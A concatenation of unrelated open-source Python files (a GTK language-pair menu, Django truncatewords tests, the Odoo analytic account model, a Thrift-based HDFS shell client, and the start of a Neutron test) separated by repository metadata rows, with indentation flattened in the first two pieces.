item.connect('activate', self._on_pairitem_activated, i)
self.recent_items.append(item)
        separator = gtk.SeparatorMenuItem()
        self.other_item = gtk.MenuItem(_('_New Language Pair...'))
        self.other_item.connect('activate', self._on_other_activated)
        for item in (separator, self.other_item):
            self.menu.append(item)
self.update_recent_pairs()
# METHODS #
def _get_display_string(self, srclang, tgtlang):
if self.popupbutton.get_direction() == gtk.TEXT_DIR_RTL:
# We need to make sure we get the direction correct if the
# language names are untranslated. The right-to-left embedding
# (RLE) characters ensure that untranslated language names will
# still diplay with the correct direction as they are present
# in the interface.
pairlabel = u'\u202b%s ← \u202b%s' % (srclang.name, tgtlang.name)
else:
pairlabel = u'%s → %s' % (srclang.name, tgtlang.name)
# While it seems that the arrows are not well supported on Windows
# systems, we fall back to using the French quotes. It automatically
# does the right thing for RTL.
if os.name == 'nt':
pairlabel = u'%s » %s' % (srclang.name, tgtlang.name)
return pairlabel
def notify_same_langs(self):
def notify():
for s in [gtk.STATE_ACTIVE, gtk.STATE_NORMAL, gtk.STATE_PRELIGHT, gtk.STATE_SELECTED]:
self.popupbutton.child.modify_fg(s, gtk.gdk.color_parse('#f66'))
gobject.idle_add(notify)
def notify_diff_langs(self):
def notify():
if hasattr(self, 'popup_default_fg'):
fgcol = self.popup_default_fg
else:
fgcol = gtk.widget_get_default_style().fg
for s in [gtk.STATE_ACTIVE, gtk.STATE_NORMAL, gtk.STATE_PRELIGHT, gtk.STATE_SELECTED]:
self.popupbutton.child.modify_fg(s, fgcol[s])
gobject.idle_add(notify)
def show(self):
"""Add the managed C{PopupMenuButton} to the C{MainView}'s status bar."""
statusbar = self.controller.main_controller.view.status_bar
for child in statusbar.get_children():
if child is self.popupbutton:
return
statusbar.pack_end(self.popupbutton, expand=False)
statusbar.show_all()
def focus(self):
self.popupbutton.grab_focus()
def update_recent_pairs(self):
if not self.menu:
self._init_menu()
# Clear all menu items
for i in range(self.controller.NUM_RECENT):
item = self.recent_items[i]
if item.parent is self.menu:
item.get_child().set_text('')
self.menu.remove(item)
# Update menu items' strings
i = 0
for pair in self.controller.recent_pairs:
if i not in range(self.controller.NUM_RECENT):
break
self.recent_items[i].get_child().set_text_with_mnemonic(
"_%(accesskey)d. %(language_pair)s" % {
"accesskey": i + 1,
"language_pair": self._get_display_string(*pair)
}
)
i += 1
# Re-add menu items that have something to show
for i in range(self.controller.NUM_RECENT):
item = self.recent_items[i]
if item.get_child().get_text():
self.menu.insert(item, i)
self.menu.show_all()
self.popupbutton.text = self.recent_items[0].get_child().get_text()[3:]
# EVENT HANDLERS #
def _on_addlang_clicked(self, button):
if not self.add_dialog.run():
return
err = self.add_dialog.check_input_sanity()
if err:
self.controller.main_controller.show_error(err)
return
name = self.add_dialog.langname
code = self.add_dialog.langcode
nplurals = self.add_dialog.nplurals
plural = self.add_dialog.plural
if self.add_dialog.langcode in LanguageModel.languages:
raise Exception('Language code %s already used.' % (code))
LanguageModel.languages[code] = (name, nplurals, plural)
self.controller.new_langs.append(code)
# Reload the language data in the selection dialog.
self.select_dialog.clear_langs()
langs = [LanguageModel(lc) for lc in LanguageModel.languages]
langs.sort(key=lambda x: x.name)
self.select_dialog.update_languages(langs)
def _on_button_toggled(self, popupbutton):
if not popupbutton.get_active():
return
detected = self.controller.get_detected_langs()
if detected and len(detected) == 2 and detected[0] and detected[1]:
logging.debug("Detected language pair: %s -> %s" % (detected[0].code, detected[1].code))
if detected not in self.controller.recent_pairs:
if len(self.controller.recent_pairs) >= self.controller.NUM_RECENT:
self.controller.recent_pairs[-1] = detected
else:
self.controller.recent_pairs.append(detected)
self.update_recent_pairs()
def _on_other_activated(self, menuitem):
if not getattr(self, 'select_dialog', None):
self._create_dialogs()
if self.select_dialog.run(self.controller.source_lang.code, self.controller.target_lang.code):
self.controller.set_language_pair(
self.select_dialog.get_selected_source_lang(),
self.select_dialog.get_selected_target_lang()
)
self.controller.main_controller.unit_controller.view.targets[0].grab_focus()
def _on_pairitem_activated(self, menuitem, item_n):
logging.debug('Selected language pair: %s' % (self.recent_items[item_n].get_child().get_text()))
pair = self.controller.recent_pairs[item_n]
self.controller.set_language_pair(*pair)
self.controller.main_controller.unit_controller.view.targets[0].grab_focus()
def _on_style_set(self, widget, prev_style):
if not hasattr(self, 'popup_default_fg'):
self.popup_default_fg = widget.style.fg
| gpl-2.0 | -1,565,351,128,856,898,800 | 38.450893 | 113 | 0.628607 | false |
mshafiq9/django | tests/template_tests/filter_tests/test_truncatewords.py | 215 | 1705 | from django.template.defaultfilters import truncatewords
from django.test import SimpleTestCase
from django.utils.safestring import mark_safe
from ..utils import setup
class TruncatewordsTests(SimpleTestCase):
@setup({'truncatewords01':
'{% autoescape off %}{{ a|truncatewords:"2" }} {{ b|truncatewords:"2"}}{% endautoescape %}'})
def test_truncatewords01(self):
output = self.engine.render_to_string('truncatewords01', {'a': 'alpha & bravo', 'b': mark_safe('alpha & bravo')})
self.assertEqual(output, 'alpha & ... alpha & ...')
@setup({'truncatewords02': '{{ a|truncatewords:"2" }} {{ b|truncatewords:"2"}}'})
def test_truncatewords02(self):
output = self.engine.render_to_string('truncatewords02', {'a': 'alpha & bravo', 'b': mark_safe('alpha & bravo')})
self.assertEqual(output, 'alpha & ... alpha & ...')
class FunctionTests(SimpleTestCase):
def test_truncate(self):
self.assertEqual(truncatewords('A sentence with a few words in it', 1), 'A ...')
def test_truncate2(self):
self.assertEqual(
truncatewords('A sentence with a few words in it', 5),
'A sentence with a few ...',
)
def test_overtruncate(self):
self.assertEqual(
truncatewords('A sentence with a few words in it', 100),
'A sentence with a few words in it',
)
def test_invalid_number(self):
self.assertEqual(
truncatewords('A sentence with a few words in it', 'not a number'),
'A sentence with a few words in it',
)
def test_non_string_input(self):
self.assertEqual(truncatewords(123, 2), '123')
| bsd-3-clause | -2,592,121,439,148,183,000 | 36.065217 | 125 | 0.624633 | false |
simongoffin/my_odoo_tutorial | addons/analytic/analytic.py | 12 | 17961 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from datetime import datetime
from openerp.osv import fields, osv
from openerp import tools
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
class account_analytic_account(osv.osv):
_name = 'account.analytic.account'
_inherit = ['mail.thread']
_description = 'Analytic Account'
_track = {
'state': {
'analytic.mt_account_pending': lambda self, cr, uid, obj, ctx=None: obj.state == 'pending',
'analytic.mt_account_closed': lambda self, cr, uid, obj, ctx=None: obj.state == 'close',
'analytic.mt_account_opened': lambda self, cr, uid, obj, ctx=None: obj.state == 'open',
},
}
def _compute_level_tree(self, cr, uid, ids, child_ids, res, field_names, context=None):
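        # Roll totals up the account tree: each account's figures are its own
        # values plus the (currency-converted) totals of all of its children.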
currency_obj = self.pool.get('res.currency')
recres = {}
def recursive_computation(account):
result2 = res[account.id].copy()
for son in account.child_ids:
result = recursive_computation(son)
for field in field_names:
if (account.currency_id.id != son.currency_id.id) and (field!='quantity'):
result[field] = currency_obj.compute(cr, uid, son.currency_id.id, account.currency_id.id, result[field], context=context)
result2[field] += result[field]
return result2
for account in self.browse(cr, uid, ids, context=context):
if account.id not in child_ids:
continue
recres[account.id] = recursive_computation(account)
return recres
def _debit_credit_bal_qtty(self, cr, uid, ids, fields, arg, context=None):
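        # Aggregate raw analytic lines per account (positive amounts count as
        # debit, negative as credit), then roll the sums up the hierarchy.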
res = {}
if context is None:
context = {}
child_ids = tuple(self.search(cr, uid, [('parent_id', 'child_of', ids)]))
for i in child_ids:
res[i] = {}
for n in fields:
res[i][n] = 0.0
if not child_ids:
return res
where_date = ''
where_clause_args = [tuple(child_ids)]
if context.get('from_date', False):
where_date += " AND l.date >= %s"
where_clause_args += [context['from_date']]
if context.get('to_date', False):
where_date += " AND l.date <= %s"
where_clause_args += [context['to_date']]
cr.execute("""
SELECT a.id,
sum(
CASE WHEN l.amount > 0
THEN l.amount
ELSE 0.0
END
) as debit,
sum(
CASE WHEN l.amount < 0
THEN -l.amount
ELSE 0.0
END
) as credit,
COALESCE(SUM(l.amount),0) AS balance,
COALESCE(SUM(l.unit_amount),0) AS quantity
FROM account_analytic_account a
LEFT JOIN account_analytic_line l ON (a.id = l.account_id)
WHERE a.id IN %s
""" + where_date + """
GROUP BY a.id""", where_clause_args)
for row in cr.dictfetchall():
res[row['id']] = {}
for field in fields:
res[row['id']][field] = row[field]
return self._compute_level_tree(cr, uid, ids, child_ids, res, fields, context)
def name_get(self, cr, uid, ids, context=None):
res = []
if not ids:
return res
if isinstance(ids, (int, long)):
ids = [ids]
for id in ids:
elmt = self.browse(cr, uid, id, context=context)
res.append((id, self._get_one_full_name(elmt)))
return res
def _get_full_name(self, cr, uid, ids, name=None, args=None, context=None):
if context == None:
context = {}
res = {}
for elmt in self.browse(cr, uid, ids, context=context):
res[elmt.id] = self._get_one_full_name(elmt)
return res
def _get_one_full_name(self, elmt, level=6):
if level<=0:
return '...'
        if elmt.parent_id and elmt.type != 'template':
parent_path = self._get_one_full_name(elmt.parent_id, level-1) + " / "
else:
parent_path = ''
return parent_path + elmt.name
def _child_compute(self, cr, uid, ids, name, arg, context=None):
result = {}
if context is None:
context = {}
for account in self.browse(cr, uid, ids, context=context):
result[account.id] = map(lambda x: x.id, [child for child in account.child_ids if child.state != 'template'])
return result
def _get_analytic_account(self, cr, uid, ids, context=None):
company_obj = self.pool.get('res.company')
analytic_obj = self.pool.get('account.analytic.account')
accounts = []
for company in company_obj.browse(cr, uid, ids, context=context):
accounts += analytic_obj.search(cr, uid, [('company_id', '=', company.id)])
return accounts
def _set_company_currency(self, cr, uid, ids, name, value, arg, context=None):
if isinstance(ids, (int, long)):
ids=[ids]
for account in self.browse(cr, uid, ids, context=context):
if account.company_id:
if account.company_id.currency_id.id != value:
                    raise osv.except_osv(_('Error!'), _("If you set a company, the selected currency has to be the same as its currency. \nYou can remove the company link, and thus change the currency, only on analytic accounts of type 'view'. This can be really useful for consolidation purposes of several companies' charts with different currencies, for example."))
if value:
cr.execute("""update account_analytic_account set currency_id=%s where id=%s""", (value, account.id))
self.invalidate_cache(cr, uid, ['currency_id'], [account.id], context=context)
def _currency(self, cr, uid, ids, field_name, arg, context=None):
result = {}
for rec in self.browse(cr, uid, ids, context=context):
if rec.company_id:
result[rec.id] = rec.company_id.currency_id.id
else:
result[rec.id] = rec.currency_id.id
return result
_columns = {
'name': fields.char('Account/Contract Name', required=True, track_visibility='onchange'),
'complete_name': fields.function(_get_full_name, type='char', string='Full Name'),
'code': fields.char('Reference', select=True, track_visibility='onchange', copy=False),
'type': fields.selection([('view','Analytic View'), ('normal','Analytic Account'),('contract','Contract or Project'),('template','Template of Contract')], 'Type of Account', required=True,
help="If you select the View Type, it means you won\'t allow to create journal entries using that account.\n"\
"The type 'Analytic account' stands for usual accounts that you only want to use in accounting.\n"\
"If you select Contract or Project, it offers you the possibility to manage the validity and the invoicing options for this account.\n"\
"The special type 'Template of Contract' allows you to define a template with default data that you can reuse easily."),
'template_id': fields.many2one('account.analytic.account', 'Template of Contract'),
'description': fields.text('Description'),
'parent_id': fields.many2one('account.analytic.account', 'Parent Analytic Account', select=2),
'child_ids': fields.one2many('account.analytic.account', 'parent_id', 'Child Accounts'),
'child_complete_ids': fields.function(_child_compute, relation='account.analytic.account', string="Account Hierarchy", type='many2many'),
'line_ids': fields.one2many('account.analytic.line', 'account_id', 'Analytic Entries'),
'balance': fields.function(_debit_credit_bal_qtty, type='float', string='Balance', multi='debit_credit_bal_qtty', digits_compute=dp.get_precision('Account')),
'debit': fields.function(_debit_credit_bal_qtty, type='float', string='Debit', multi='debit_credit_bal_qtty', digits_compute=dp.get_precision('Account')),
'credit': fields.function(_debit_credit_bal_qtty, type='float', string='Credit', multi='debit_credit_bal_qtty', digits_compute=dp.get_precision('Account')),
'quantity': fields.function(_debit_credit_bal_qtty, type='float', string='Quantity', multi='debit_credit_bal_qtty'),
'quantity_max': fields.float('Prepaid Service Units', help='Sets the higher limit of time to work on the contract, based on the timesheet. (for instance, number of hours in a limited support contract.)'),
'partner_id': fields.many2one('res.partner', 'Customer'),
'user_id': fields.many2one('res.users', 'Project Manager', track_visibility='onchange'),
'manager_id': fields.many2one('res.users', 'Account Manager', track_visibility='onchange'),
'date_start': fields.date('Start Date'),
'date': fields.date('Expiration Date', select=True, track_visibility='onchange'),
'company_id': fields.many2one('res.company', 'Company', required=False), #not required because we want to allow different companies to use the same chart of account, except for leaf accounts.
'state': fields.selection([('template', 'Template'),
('draft','New'),
('open','In Progress'),
('pending','To Renew'),
('close','Closed'),
('cancelled', 'Cancelled')],
'Status', required=True,
track_visibility='onchange', copy=False),
'currency_id': fields.function(_currency, fnct_inv=_set_company_currency, #the currency_id field is readonly except if it's a view account and if there is no company
store = {
'res.company': (_get_analytic_account, ['currency_id'], 10),
}, string='Currency', type='many2one', relation='res.currency'),
}
def on_change_template(self, cr, uid, ids, template_id, date_start=False, context=None):
if not template_id:
return {}
res = {'value':{}}
template = self.browse(cr, uid, template_id, context=context)
if template.date_start and template.date:
from_dt = datetime.strptime(template.date_start, tools.DEFAULT_SERVER_DATE_FORMAT)
to_dt = datetime.strptime(template.date, tools.DEFAULT_SERVER_DATE_FORMAT)
timedelta = to_dt - from_dt
res['value']['date'] = datetime.strftime(datetime.now() + timedelta, tools.DEFAULT_SERVER_DATE_FORMAT)
if not date_start:
res['value']['date_start'] = fields.date.today()
res['value']['quantity_max'] = template.quantity_max
res['value']['parent_id'] = template.parent_id and template.parent_id.id or False
res['value']['description'] = template.description
return res
def on_change_partner_id(self, cr, uid, ids,partner_id, name, context=None):
res={}
if partner_id:
partner = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context)
if partner.user_id:
res['manager_id'] = partner.user_id.id
if not name:
res['name'] = _('Contract: ') + partner.name
return {'value': res}
def _default_company(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
if user.company_id:
return user.company_id.id
return self.pool.get('res.company').search(cr, uid, [('parent_id', '=', False)])[0]
def _get_default_currency(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
return user.company_id.currency_id.id
_defaults = {
'type': 'normal',
'company_id': _default_company,
'code' : lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'account.analytic.account'),
'state': 'open',
'user_id': lambda self, cr, uid, ctx: uid,
'partner_id': lambda self, cr, uid, ctx: ctx.get('partner_id', False),
'date_start': lambda *a: time.strftime('%Y-%m-%d'),
'currency_id': _get_default_currency,
}
def check_recursion(self, cr, uid, ids, context=None, parent=None):
return super(account_analytic_account, self)._check_recursion(cr, uid, ids, context=context, parent=parent)
_order = 'code, name asc'
_constraints = [
(check_recursion, 'Error! You cannot create recursive analytic accounts.', ['parent_id']),
]
def name_create(self, cr, uid, name, context=None):
raise osv.except_osv(_('Warning'), _("Quick account creation disallowed."))
def copy(self, cr, uid, id, default=None, context=None):
if not default:
default = {}
analytic = self.browse(cr, uid, id, context=context)
default['name'] = _("%s (copy)") % analytic['name']
return super(account_analytic_account, self).copy(cr, uid, id, default, context=context)
def on_change_company(self, cr, uid, id, company_id):
if not company_id:
return {}
currency = self.pool.get('res.company').read(cr, uid, [company_id], ['currency_id'])[0]['currency_id']
return {'value': {'currency_id': currency}}
def on_change_parent(self, cr, uid, id, parent_id):
if not parent_id:
return {}
parent = self.read(cr, uid, [parent_id], ['partner_id','code'])[0]
if parent['partner_id']:
partner = parent['partner_id'][0]
else:
partner = False
res = {'value': {}}
if partner:
res['value']['partner_id'] = partner
return res
def name_search(self, cr, uid, name, args=None, operator='ilike', context=None, limit=100):
if not args:
args=[]
if context is None:
context={}
if name:
account_ids = self.search(cr, uid, [('code', '=', name)] + args, limit=limit, context=context)
if not account_ids:
dom = []
for name2 in name.split('/'):
name = name2.strip()
account_ids = self.search(cr, uid, dom + [('name', 'ilike', name)] + args, limit=limit, context=context)
if not account_ids: break
dom = [('parent_id','in',account_ids)]
else:
account_ids = self.search(cr, uid, args, limit=limit, context=context)
return self.name_get(cr, uid, account_ids, context=context)
class account_analytic_line(osv.osv):
_name = 'account.analytic.line'
_description = 'Analytic Line'
_columns = {
'name': fields.char('Description', required=True),
'date': fields.date('Date', required=True, select=True),
'amount': fields.float('Amount', required=True, help='Calculated by multiplying the quantity and the price given in the Product\'s cost price. Always expressed in the company main currency.', digits_compute=dp.get_precision('Account')),
'unit_amount': fields.float('Quantity', help='Specifies the amount of quantity to count.'),
'account_id': fields.many2one('account.analytic.account', 'Analytic Account', required=True, ondelete='restrict', select=True, domain=[('type','<>','view')]),
'user_id': fields.many2one('res.users', 'User'),
'company_id': fields.related('account_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),
}
def _get_default_date(self, cr, uid, context=None):
return fields.date.context_today(self, cr, uid, context=context)
def __get_default_date(self, cr, uid, context=None):
return self._get_default_date(cr, uid, context=context)
_defaults = {
'date': __get_default_date,
'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'account.analytic.line', context=c),
'amount': 0.00
}
_order = 'date desc'
def _check_no_view(self, cr, uid, ids, context=None):
analytic_lines = self.browse(cr, uid, ids, context=context)
for line in analytic_lines:
if line.account_id.type == 'view':
return False
return True
_constraints = [
(_check_no_view, 'You cannot create analytic line on view account.', ['account_id']),
]
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -3,811,703,180,882,763,300 | 49.310924 | 372 | 0.581872 | false |
liangly/hadoop-common | src/contrib/thriftfs/scripts/hdfs.py | 116 | 14991 | #!/usr/bin/env python
"""
hdfs.py is a python client for the thrift interface to HDFS.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied. See the License for the specific language governing permissions
and limitations under the License.
"""
import sys
sys.path.append('../gen-py')
from optparse import OptionParser
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from hadoopfs import ThriftHadoopFileSystem
from hadoopfs.ttypes import *
from readline import *
from cmd import *
import os
import re
import readline
import subprocess
#
# The address of the FileSystemClientProxy. If the host and port are
# not specified, then a proxy server is automatically spawned.
#
host = 'localhost'
port = 4677 # use any port
proxyStartScript = './start_thrift_server.sh'
startServer = True # shall we start a proxy server?
#
# The hdfs interactive shell. The Cmd class from the standard library's cmd
# module uses readline + implements a whole bunch of utility stuff like help
# and custom tab completions. It makes everything real easy.
#
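# An illustrative session (paths are hypothetical):
#
#   hdfs>> put /tmp/local.txt /user/foo/remote.txt
#   hdfs>> ls /user/foo
#   hdfs>> get /user/foo/remote.txt /tmp/copy.txt
#   hdfs>> quit
#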
class hadoopthrift_cli(Cmd):
# my custom prompt looks better than the default
prompt = 'hdfs>> '
#############################
# Class constructor
#############################
def __init__(self, server_name, server_port):
Cmd.__init__(self)
self.server_name = server_name
self.server_port = server_port
#############################
# Start the ClientProxy Server if we can find it.
# Read in its stdout to determine what port it is running on
#############################
def startProxyServer(self):
try:
      # Popen's second positional argument is bufsize, not a program argument,
      # so pass the port to the script through the argument list instead.
      p = subprocess.Popen([proxyStartScript, str(self.server_port)],
                           stdout=subprocess.PIPE)
      content = p.stdout.readline()
      p.stdout.close()
      val = re.split(r'\[|\]', content)
print val[1]
self.server_port = val[1]
return True
except Exception, ex:
print "ERROR in starting proxy server " + proxyStartScript
print '%s' % (ex.message)
return False
#############################
# Connect to clientproxy
#############################
def connect(self):
try:
# connect to hdfs thrift server
self.transport = TSocket.TSocket(self.server_name, self.server_port)
self.transport = TTransport.TBufferedTransport(self.transport)
self.protocol = TBinaryProtocol.TBinaryProtocol(self.transport)
# Create a client to use the protocol encoder
self.client = ThriftHadoopFileSystem.Client(self.protocol)
self.transport.open()
# tell the HadoopThrift server to die after 60 minutes of inactivity
self.client.setInactivityTimeoutPeriod(60*60)
return True
except Thrift.TException, tx:
print "ERROR in connecting to ", self.server_name, ":", self.server_port
print '%s' % (tx.message)
return False
#
# Disconnect from client proxy
#
def shutdown(self):
try :
self.transport.close()
except Exception, tx:
return False
#############################
# Create the specified file. Returns a handle to write data.
#############################
def do_create(self, name):
if name == "":
print " ERROR usage: create <pathname>"
print
return 0
# Create the file, and immediately closes the handle
path = Pathname();
path.pathname = name;
status = self.client.create(path)
self.client.close(status)
return 0
#############################
# Delete the specified file.
#############################
def do_rm(self, name):
if name == "":
print " ERROR usage: rm <pathname>\n"
return 0
# delete file
path = Pathname();
path.pathname = name;
status = self.client.rm(path, False)
if status == False:
print " ERROR in deleting path: " + name
return 0
#############################
# Rename the specified file/dir
#############################
def do_mv(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: mv <srcpathname> <destpathname>\n"
return 0
src = params[0].strip()
dest = params[1].strip()
if src == "":
print " ERROR usage: mv <srcpathname> <destpathname>\n"
return 0
if dest == "":
print " ERROR usage: mv <srcpathname> <destpathname>\n"
return 0
# move file
path = Pathname();
path.pathname = src;
destpath = Pathname();
destpath.pathname = dest;
status = self.client.rename(path, destpath)
if status == False:
print " ERROR in renaming path: " + name
return 0
#############################
# Delete the specified file.
#############################
def do_mkdirs(self, name):
if name == "":
print " ERROR usage: mkdirs <pathname>\n"
return 0
# create directory
path = Pathname();
path.pathname = name;
fields = self.client.mkdirs(path)
return 0
#############################
# does the pathname exist?
#############################
def do_exists(self, name):
if name == "":
print " ERROR usage: exists <pathname>\n"
return 0
# check existence of pathname
path = Pathname();
path.pathname = name;
fields = self.client.exists(path)
if (fields == True):
print name + " exists."
else:
print name + " does not exist."
return 0
#############################
# copy local file into hdfs
#############################
def do_put(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: put <localpathname> <hdfspathname>\n"
return 0
local = params[0].strip()
hdfs = params[1].strip()
if local == "":
print " ERROR usage: put <localpathname> <hdfspathname>\n"
return 0
if hdfs == "":
print " ERROR usage: put <localpathname> <hdfspathname>\n"
return 0
# open local file
input = open(local, 'rb')
# open output file
path = Pathname();
path.pathname = hdfs;
output = self.client.create(path)
# read 1MB at a time and upload to hdfs
while True:
chunk = input.read(1024*1024)
if not chunk: break
self.client.write(output, chunk)
self.client.close(output)
input.close()
#############################
# copy hdfs file into local
#############################
def do_get(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: get <hdfspathname> <localpathname>\n"
return 0
hdfs = params[0].strip()
local = params[1].strip()
if local == "":
print " ERROR usage: get <hdfspathname> <localpathname>\n"
return 0
if hdfs == "":
print " ERROR usage: get <hdfspathname> <localpathname>\n"
return 0
# open output local file
output = open(local, 'wb')
# open input hdfs file
path = Pathname();
path.pathname = hdfs;
input = self.client.open(path)
# find size of hdfs file
filesize = self.client.stat(path).length
    # read 1MB at a time from hdfs
offset = 0
chunksize = 1024 * 1024
while True:
chunk = self.client.read(input, offset, chunksize)
if not chunk: break
output.write(chunk)
offset += chunksize
if (offset >= filesize): break
self.client.close(input)
output.close()
#############################
# List attributes of this path
#############################
def do_ls(self, name):
if name == "":
print " ERROR usage: list <pathname>\n"
return 0
# list file status
path = Pathname();
path.pathname = name;
status = self.client.stat(path)
if (status.isdir == False):
self.printStatus(status)
return 0
# This is a directory, fetch its contents
liststatus = self.client.listStatus(path)
for item in liststatus:
self.printStatus(item)
#############################
# Set permissions for a file
#############################
def do_chmod(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: chmod 774 <pathname>\n"
return 0
perm = params[0].strip()
name = params[1].strip()
if name == "":
print " ERROR usage: chmod 774 <pathname>\n"
return 0
if perm == "":
print " ERROR usage: chmod 774 <pathname>\n"
return 0
# set permissions (in octal)
path = Pathname();
path.pathname = name;
status = self.client.chmod(path, int(perm,8))
return 0
#############################
# Set owner for a file. This is not an atomic operation.
# A change to the group of a file may be overwritten by this one.
#############################
def do_chown(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: chown <ownername> <pathname>\n"
return 0
owner = params[0].strip()
name = params[1].strip()
if name == "":
print " ERROR usage: chown <ownername> <pathname>\n"
return 0
# get the current owner and group
path = Pathname();
path.pathname = name;
cur = self.client.stat(path)
# set new owner, keep old group
status = self.client.chown(path, owner, cur.group)
return 0
#######################################
# Set the replication factor for a file
######################################
def do_setreplication(self, line):
params = line.split()
if (len(params) != 2):
print " ERROR usage: setreplication <replication factor> <pathname>\n"
return 0
repl = params[0].strip()
name = params[1].strip()
if name == "":
print " ERROR usage: setreplication <replication factor> <pathname>\n"
return 0
if repl == "":
print " ERROR usage: setreplication <replication factor> <pathname>\n"
return 0
path = Pathname();
path.pathname = name;
status = self.client.setReplication(path, int(repl))
return 0
#############################
# Display the locations of the blocks of this file
#############################
def do_getlocations(self, name):
if name == "":
print " ERROR usage: getlocations <pathname>\n"
return 0
path = Pathname();
path.pathname = name;
# find size of hdfs file
filesize = self.client.stat(path).length
# getlocations file
blockLocations = self.client.getFileBlockLocations(path, 0, filesize)
for item in blockLocations:
self.printLocations(item)
return 0
#############################
# Utility methods from here
#############################
#
# If I don't do this, the last command is always re-executed which is annoying.
#
def emptyline(self):
pass
#
# print the status of a path
#
def printStatus(self, stat):
print str(stat.block_replication) + "\t" + str(stat.length) + "\t" + str(stat.modification_time) + "\t" + stat.permission + "\t" + stat.owner + "\t" + stat.group + "\t" + stat.path
#
# print the locations of a block
#
def printLocations(self, location):
print str(location.names) + "\t" + str(location.offset) + "\t" + str(location.length)
#
# Various ways to exit the hdfs shell
#
def do_quit(self,ignored):
try:
if startServer:
self.client.shutdown(1)
return -1
except Exception, ex:
return -1
def do_q(self,ignored):
return self.do_quit(ignored)
# ctl-d
def do_EOF(self,ignored):
return self.do_quit(ignored)
#
# Give the user some amount of help - I am a nice guy
#
def help_create(self):
print "create <pathname>"
def help_rm(self):
print "rm <pathname>"
def help_mv(self):
print "mv <srcpathname> <destpathname>"
def help_mkdirs(self):
print "mkdirs <pathname>"
def help_exists(self):
print "exists <pathname>"
def help_put(self):
print "put <localpathname> <hdfspathname>"
def help_get(self):
print "get <hdfspathname> <localpathname>"
def help_ls(self):
print "ls <hdfspathname>"
def help_chmod(self):
print "chmod 775 <hdfspathname>"
def help_chown(self):
print "chown <ownername> <hdfspathname>"
def help_setreplication(self):
print "setrep <replication factor> <hdfspathname>"
def help_getlocations(self):
print "getlocations <pathname>"
def help_EOF(self):
print '<ctl-d> will quit this program.'
def help_quit(self):
print 'if you need to know what quit does, you shouldn\'t be using a computer.'
def help_q(self):
print 'quit and if you need to know what quit does, you shouldn\'t be using a computer.'
def help_help(self):
print 'duh'
def usage(exec_name):
print "Usage: "
print " %s [proxyclientname [proxyclientport]]" % exec_name
print " %s -v" % exec_name
print " %s --help" % exec_name
print " %s -h" % exec_name
if __name__ == "__main__":
#
# Rudimentary command line processing.
#
# real parsing:
parser = OptionParser()
parser.add_option("-e", "--execute", dest="command_str",
help="execute this command and exit")
parser.add_option("-s","--proxyclient",dest="host",help="the proxyclient's hostname")
parser.add_option("-p","--port",dest="port",help="the proxyclient's port number")
(options, args) = parser.parse_args()
#
# Save host and port information of the proxy server
#
if (options.host):
host = options.host
startServer = False
if (options.port):
port = options.port
startServer = False
#
# Retrieve the user's readline history.
#
historyFileName = os.path.expanduser("~/.hdfs_history")
if (os.path.exists(historyFileName)):
readline.read_history_file(historyFileName)
#
# Create class and connect to proxy server
#
c = hadoopthrift_cli(host,port)
if startServer:
if c.startProxyServer() == False:
sys.exit(1)
if c.connect() == False:
sys.exit(1)
#
# If this utility was invoked with one argument, process it
#
if (options.command_str):
c.onecmd(options.command_str)
sys.exit(0)
#
# Start looping over user commands.
#
c.cmdloop('Welcome to the Thrift interactive shell for Hadoop File System. - how can I help you? ' + '\n'
'Press tab twice to see the list of commands. ' + '\n' +
'To complete the name of a command press tab once. \n'
)
    c.shutdown()
readline.write_history_file(historyFileName)
print '' # I am nothing if not courteous.
sys.exit(0)
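# Example interactive session (hypothetical; assumes the Thrift proxy server
# can be started or reached with the defaults above):
#
#   $ python hdfs.py
#   hdfs>> mkdirs /tmp/demo
#   hdfs>> put local.txt /tmp/demo/remote.txt
#   hdfs>> ls /tmp/demo
#   hdfs>> setreplication 3 /tmp/demo/remote.txt
#   hdfs>> quit
#
# cmd.Cmd dispatches each "name args" line to the matching do_name handler
# defined in the class above.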
| apache-2.0 | -5,939,983,571,205,586,000 | 26.010811 | 184 | 0.590955 | false |
gopal1cloud/neutron | neutron/tests/unit/test_common_log.py | 22 | 2943 | # Copyright (c) 2013 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.common import log as call_log
from neutron.tests import base
MODULE_NAME = 'neutron.tests.unit.test_common_log'
class TargetKlass(object):
@call_log.log
